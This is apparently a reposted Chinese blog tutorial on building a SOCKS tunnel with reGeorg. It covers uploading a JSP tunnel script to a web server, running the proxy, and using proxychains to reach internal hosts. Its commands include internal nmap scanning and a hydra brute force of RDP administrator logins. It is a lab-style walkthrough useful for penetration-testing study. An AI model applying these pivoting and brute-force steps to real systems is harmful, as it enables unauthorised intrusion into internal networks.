regeorg搭建socket隧道

news2025/2/23 0:56:46

regeorg搭建socket隧道

工具安装

  • 下载地址
https://github.com/sensepost/reGeorg

环境配置

  • 说明
reGeorg提供了PHP、ASPX、JSP脚本,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。

# 攻击过程
vps:192.168.110.131
web服务器:192.168.110.1
内网主机:192.168.110.2
当vps上传脚本到web服务器,监听自身的端口,假设web服务器和内网主机可以互通,那vps可以访问到内网主机
  • 安装工具
windows和linux需要安装setuptools,在下载的regeorg文件夹中运行以下命令:
pip install setuptools

window会生成以下文件夹

在这里插入图片描述

linux会生成相同的文件夹

在这里插入图片描述

  • 将.jsp文件上传到web服务器后,看vps是否能够访问
curl .jsp文件的地址

在这里插入图片描述

  • 能访问之后运行python,监听本地端口
python2 reGeorgSocksProxy.py -p 9999 -u http://192.168.110.1:8000/tunnel.tomcat.5.jsp

//出现Georg says, ‘All seems fine说明运行正常

在这里插入图片描述

  • 隧道正常工作后,使用proxychains工具,访问内网资源
git clone https://github.com/rofl0r/proxychains-ng  //下载proxychains
vim /etc/proxychains.conf  //修改配置文件
socks5  192.168.110.131 9999   //在配置文件最后一行修改

在这里插入图片描述

在这里插入图片描述

  • 使用proxychains
使用方法:

proxychains <运行的命令> <命令参数>

只要在需要代理的命令前面加上proxychains即可,例如:
proxychains firefox 可以使用firefox浏览器远程访问内网服务器
proxychains nmap -T4 -A 10.8.0.0/24 扫描内网开放端口

当需要访问内网web时,可使用:
proxychains curl 内网主机ip

当需要爆破内网主机的3389时
proxychains hydra -s 3389 -v -l administrator -P 1.txt -t 16 内网主机ip

参考

https://blog.csdn.net/weixin_30245867/article/details/98036505

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2059869.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

游戏内音乐盒、游戏内实时翻译外国队友语音的实现思路

奈何自己不能精通多个语言&#xff0c;在外服游戏的时候经常遇到老外叽里咕噜说一堆话&#xff0c;不知道讲些什么&#xff0c;可能有俄语、法语等&#xff0c;这时候有一个可以在游戏内实时翻译语言的工具就好了。 在本文中&#xff0c;我们将探讨如何提取游戏内的音频、队友…

Unity动画模块 之 3D模型导入基础设置 Rig页签

​本文仅作笔记学习和分享&#xff0c;不用做任何商业用途本文包括但不限于unity官方手册&#xff0c;unity唐老狮等教程知识&#xff0c;如有不足还请斧正​​ 1.Rig页签 Rig 选项卡 - Unity 手册&#xff0c;rig是设置骨骼与替身系统的&#xff0c;工作流程如下 Avatar是什么…

OpenAI 将向企业开放 GPT-4o 模型定制版

OpenAI 最近发布了一项新功能&#xff0c;使企业客户可以通过微调技术定制 GPT-4o 模型&#xff0c;从而应对日益激烈的人工智能竞争&#xff0c;并展示其投资回报。这一新功能的推出使得企业能够使用自己的数据对 GPT-4o 模型进行个性化调整&#xff0c;以满足他们的特定需求和…

学习设置echarts 折线图使用相关参数的方法整理

学习设置echarts 折线图使用相关参数的方法整理 折线图堆叠设置为不堆叠的方法 折线图堆叠设置为不堆叠的方法 官网是这样的&#xff0c;但是不需要这种堆叠形式的如下图&#xff1a; 第2条数据值 第1条数据值 第2条数据值 第3条数据值 第2条数据值 第3条数据值 需要改成…

通讯专题-RS232

1 概述 RS-232是一种点对点通信协议&#xff0c;这意味着每个数据信号沿一根导线传输&#xff08;差分信号使用两根导线传输一个数据信号&#xff09;&#xff0c;RS-232为全双工方式运行&#xff08;总线可同时发送和接收数据&#xff09;。 根据新修订的标准为容性负载为2500…

Servlet技术介绍与实践

Servlet技术是Java Web开发的核心组件之一&#xff0c;它提供了一种在Web服务器上执行Java代码的机制。自Servlet API首次发布以来&#xff0c;它已成为构建动态Web应用程序的基础。本文将深入探讨Servlet的工作原理、生命周期、关键特性&#xff0c;并通过示例代码展示如何在实…

精通推荐算法28:行为序列建模之DSIN— 基于Session建模用户行为序列

1 行为序列建模总体架构 2 DSIN背景 阿里巴巴研究人员发现&#xff0c;用户行为序列是基于Session的。Session内兴趣相似且集中&#xff0c;Session间则兴趣差异较大。Session按照时间间隔来划分&#xff0c;比如 30分钟。如图5-11所示为真实场景下的多个用户行为Session。 图…

【NI国产替代】NI‑9235四分之一桥应变计,8通道C系列应变/桥输入模块

10 kS/s/ch&#xff0c;120 Ω四分之一桥应变计&#xff0c;8通道C系列应变/桥输入模块 NI‑9235可同步测量所有通道的动态应变&#xff0c;从而实现了高速同步测量。 该功能对于需要在特定时刻对多个通道进行比较的应用&#xff08;例如冲击测试&#xff09;非常重要。\n\nNI…

TCP协议段中的六个标志位

目录 ACK SYN RST FIN PSH URG TCP报文格式中的六个标志位由6个比特构成&#xff0c;在通信双方基于TCP协议互相发送报文数据时可以通过报头中标志位来区别对方发送的报文数据的请示。 ACK 确认号是否有效。 接收端对所收到的报文进行检查&#xff0c;若未发现错误&…

在控件graphicsView中实现绘图功能

文章目录 基础夯实&#xff1a;效果展示&#xff1a;一、目标&#xff1a;二、遇到的问题三、实例代码customgraphicsview.hcustomgraphicsview.cppmainwindow.hmainwindow.cppmian.cpp 基础夯实&#xff1a; 在Qt框架中&#xff0c;QGraphicsView 是一个非常强大的控件&#…

读论文《Temporal Graph Networks for Deep Learning on Dynamic Graphs》

论文地址&#xff1a;[2006.10637] Temporal Graph Networks for Deep Learning on Dynamic Graphs (arxiv.org) 项目地址&#xff1a;GitHub - twitter-research/tgn: TGN: Temporal Graph Networks 作者提出了一种名为Temporal Graph Networks&#xff08;TGNs&#xff09;…

解决selenium 常见版本不兼容问题

目录 1、解决urllib3库不兼容的问题 2、解决chromedriver与浏览器版本不兼容的问题 【测试环境】 selenium&#xff1a;3.141.0Python&#xff1a;3.10 1、解决urllib3库不兼容的问题 背景&#xff1a;在尝试启动selenium时代码出现ValueError错误&#xff0c;代码如下&am…

Excel的使用总结

目录 1、汇总公式&#xff1a;TEXTJOIN 2、excel中选择某个区域的方法 3、excel中如何在复制的时候&#xff0c;不将公式一起复制过去 4、想要自动填充某个区域的值的方法 1、汇总公式&#xff1a;TEXTJOIN TEXTJOIN 函数 - Microsoft 支持 例&#xff1a;TEXTJOIN("…

下拉表格选择器ReTableSelect组件(API)

组件实现基于 Vue3 + Element Plus + Typescript,同时引用 vueUse + lodash-es + tailwindCss (不影响功能,可忽略) 基于ReTable和Popover组件封装的下拉表格选择器组件,支持本地分页以及远程请求两种方式。 交互与展示尽量的与ElSelect保持一致。 下拉表格选择器ReTableSel…

倍思Eil这款耳机怎么样吗?南卡、倍思、QCY四款开放式耳机无广避坑测评!

近期&#xff0c;我近期&#xff0c;我注意到后台有许多小伙伴向我咨询如何挑选合适的开放式耳机。市场上开放式耳机品牌琳琅满目&#xff0c;它们在音质表现、佩戴舒适度以及综合性能上均展现出各自的差异。对于追求耳朵极致舒适体验的朋友而言&#xff0c;选择一款合适的开放…

Qt5 编译 Qt creator 源码中的 designer 模块

文章目录 下载 Qt Creator 源码 下载 Qt Creator 源码 Github: https://github.com/qt/qttools 笔记打算用 Qt 5.12.12 来编译 qt creator-designer 所以笔者下载的是 tag - 5.12.12 &#xff0c;解压后如下&#xff0c;先删除多余的文件&#xff0c;后续还要删除更多文件方便…

教程:使用Python裁剪TIF影像为多个自定义大小的小块(分割栅格)

教程&#xff1a;使用Python裁剪TIF影像为多个自定义大小的小块(分割栅格) 随着遥感技术的不断发展&#xff0c;影像数据的处理和分析在地理信息系统&#xff08;GIS&#xff09;和遥感领域显得尤为重要。在实际项目中&#xff0c;处理大规模的TIF影像数据往往需要对影像进行裁…

【原创】java+swing+mysql房屋租赁管理系统设计与实现

个人主页&#xff1a;程序员杨工 个人简介&#xff1a;从事软件开发多年&#xff0c;前后端均有涉猎&#xff0c;具有丰富的开发经验 博客内容&#xff1a;全栈开发&#xff0c;分享Java、Python、Php、小程序、前后端、数据库经验和实战 文末有本人名片&#xff0c;希望和大家…

进程的退出概念

进程退出 缺页中断&#xff08;补充&#xff09;页表中的权限位进程退出异常exit 缺页中断&#xff08;补充&#xff09; 之前我们了解了页表相关的知识&#xff0c;现在问大家一个问题&#xff0c;用new和malloc开辟内存的时候是虚拟内存还是物理内存呢&#xff1f; 答案是虚…

谷粒商城实战笔记-231-商城业务-认证服务-单点登录简介

文章目录 一&#xff0c;跨域名共享登录1&#xff0c;父子域名共享登录2&#xff0c;跨域名登录 二&#xff0c;单点登录-SSO单点登录的必要性单点登录的原理 三&#xff0c;XXL-SSO&#xff0c;开源的单点登录解决方案 一&#xff0c;跨域名共享登录 1&#xff0c;父子域名共…